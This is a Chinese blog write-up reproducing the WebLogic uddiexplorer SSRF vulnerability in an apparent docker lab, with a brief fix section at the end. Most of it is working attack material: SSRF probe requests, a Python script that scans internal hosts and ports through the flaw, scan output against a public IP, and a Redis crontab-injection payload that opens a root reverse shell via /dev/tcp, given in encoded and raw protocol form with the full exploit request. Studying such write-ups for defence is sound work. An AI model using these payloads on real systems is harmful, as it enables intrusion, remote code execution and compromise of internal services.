weblogic ssrf漏洞复现

漏洞触发点

在uddiexplorer/SearchPublicRegistries.jsp页面下,

扫描内网 探测端口

1
/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

端口开放时 返回

1
2
3
4
5
  An error has occurred
weblogicuddi.client.structures.exception.XML_SoapException: The server
at http://127.0.0.1:7001 returned a 404 error code (Not Found). Please
ensure that your URL is correct, and the web service has deployed
without error.

端口关闭时 返回

1
2
3
4
An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Tried all:
'1' addresses, but could not connect over HTTP to server: '127.0.0.1',
port: '7000'

探测协议

这里使用dict协议探测端口时,显示未知协议

1
2
An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: unknown protocol: dict

用file协议时,返回这个

1
2
An error has occurred
java.lang.ClassCastException: sun.net.www.protocol.file.FileURLConnection cannot be cast to java.net.HttpURLConnection

看来只能使用http协议来探测了

探测内网的ip地址和端口

利用docker搭建的环境内网地址一般都是172开头~~

operator=http://172.18.0.2:6379/

返回

1
2
3
4
An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Received a
response from url: http://172.18.0.2:6379 which did not have a valid
SOAP content-type: null.

和上面的有点不一样,在探测一个

operator=http://172.18.0.2:22

1
2
3
4
An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Tried all:
'1' addresses, but could not connect over HTTP to server: '172.18.0.2',
port: '22'

那就证明了6379端口是开放的

redis的默认端口就是6379,服务器可能有redis服务

探测一下配置信息

operator=http://172.18.0.2:6379/info

1
2
3
4
An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Received a
response from url: http://172.18.0.2:6379/info which did not have a
valid SOAP content-type: null.

还是返回之前的内容,这里可能没有回显

尝试了一下gopher协议,准备用gopher打内网redis,但是提示unknown protocol: gopher 哎gopher也不能用了,只能用http

这里贴一下DOUBLE–R师傅的扫描脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# coding: utf-8
# 'SSRF 扫描内网IP开放端口'

import argparse
import thread
import time
import re
import requests

def ite_ip(ip):
for i in range(1,256):
final_ip = '{ip}.{i}'.format(ip=ip,i=i)
print final_ip
thread.start_new_thread(scan,(final_ip,))
time.sleep(3)

def scan(final_ip):
ports = ('21', '22', '23', '53', '80', '135', '139', '443', '445', '1080', '1433', '1521', '3306', '3389', '4899', '8080', '7001', '8000','6389','6379')
for port in ports:
vul_url = args.url+'/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search' % (final_ip,port)
try:
r = requests.get(vul_url,timeout=15,verify=False)
result1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',r.content)
result2 = re.findall('but could not connect', r.content)
result3 = re.findall('No route to host', r.content) #bugfix:此处进行优化,防止抛出no route to host类型错误
if len(result1) != 0 and len(result2) == 0 and len(result3) == 0:
print '[!]'+final_ip + ':' + port
except Exception, e:
pass

if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Weblogic SSRF vulnerable exploit')
parser.add_argument('--url', dest='url', required=True, help='Target url')
# parser.add_argument('--ip', dest='scan_ip', help='IP to scan')
args = parser.parse_args()
# ip = '.'.join(args.scan_ip.split('.')[:-1])
ip = "172.18.0"
if ip:
print ip
ite_ip(ip)
else:
print "no ip"

扫描结果

1
2
3
4
5
6
7
8
9
10
11
12
[[email protected] ~]# python neiwang.py --url 'http://149.28.209.214:7001'
172.18.0
172.18.0.1
172.18.0.2
[!]172.18.0.2:6379
172.18.0.3
172.18.0.4
[!]172.18.0.3:7001
172.18.0.5
172.18.0.6
172.18.0.7
[!]172.18.0.1:22

利用crontab定时任务,反弹shell

redis是通过换行符(\r\n url编码==>%0d%0a),来分割命令的

使用这三条命令反弹shell

1
2
3
4
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/172.18.0.1/21 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

url编码一下

1
2
3
4
>>>import urllib
>>> s='''set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/172.18.0.1/21 0>&1\n\n\n\n"\r\nconfig set dir /etc/\r\nconfig set dbfilename crontab\r\nsave'''
>>> urllib.quote(s)
'set%201%20%22%0A%0A%0A%0A%2A%20%2A%20%2A%20%2A%20%2A%20root%20bash%20-i%20%3E%26%20/dev/tcp/172.18.0.1/21%200%3E%261%0A%0A%0A%0A%22%0D%0Aconfig%20set%20dir%20/etc/%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave'

在前后随便添加几个字符

1
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.18.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

请求头如下

1
2
3
4
5
6
GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.18.0.3:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.18.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

拿到shell

image

本来想用这个来试一下的,这里好像多了一个换行符,我用了echo,echo好像会自动加一个换行符

1
*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$59%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/172.18.0.1/2333 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$5%0d%0a/etc/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$7%0d%0acrontab%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a

可以反弹shell的文件

1
2
3
4
5
6
7
/etc/crontab

/etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell

/var/spool/cron/root centos系统下root用户的cron文件

/var/spool/cron/crontabs/root debian系统下root用户的cron文件

漏洞修复

1
2
3
jar -xvf uddiexplorer.war 
rm jsp-files
jar -cvfM uddiexplorer.war uddiexplorer/

参考链接

https://doubler.cn/2018/09/13/Vulhub-Weblogic-SSRF/